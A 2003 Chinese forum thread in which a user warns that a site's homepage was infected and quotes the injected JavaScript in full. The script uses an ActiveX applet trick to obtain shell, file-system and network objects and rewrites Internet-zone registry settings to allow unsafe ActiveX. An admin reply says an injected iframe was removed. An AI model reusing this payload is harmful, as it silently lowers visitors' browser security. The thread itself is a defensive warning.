A4S

 找回密码
 进入圣域
查看: 1605|回复: 1

警告 病毒好像又换了一个(附代码)

[复制链接]
发表于 2003-12-6 15:53 | 显示全部楼层 |阅读模式
快快删除此代码。还有一个名为script的病毒,可以破坏IE(危害之巨不用我说了吧)。我同学基本是来一次就感染一次,苦不堪言啊。而且我是杀一次毒下次就又换一个,怎么回事,可以解释吗?
赶快查一查吧。希望平安无事。
纵火老大,首页病毒代码:
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
//改写注册表处
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//结束注册表改写
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();

[此贴子已经被作者于2003-12-6 17:30:28编辑过]
回复

使用道具 举报

发表于 2003-12-6 18:18 | 显示全部楼层
谢谢,我已经清除了。

程序文件并没有被染毒,而是首页的那个跳转文件,
被莫名加了一个iframe,就是跳出的那个窗口,
把这个iframe语句删除就没有问题了。。。。

给大家造成不便非常抱歉。。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 进入圣域

本版积分规则

广告合作|Archiver|手机版|小黑屋|A4S ( 苏ICP备12080535 )

GMT+8, 2024-11-22 12:05 , Processed in 0.085937 second(s), 9 queries , File On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表